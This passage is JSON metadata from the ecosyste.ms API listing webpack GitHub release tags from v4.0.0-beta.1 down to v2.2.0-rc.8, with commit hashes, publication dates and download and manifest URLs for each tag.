os.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/h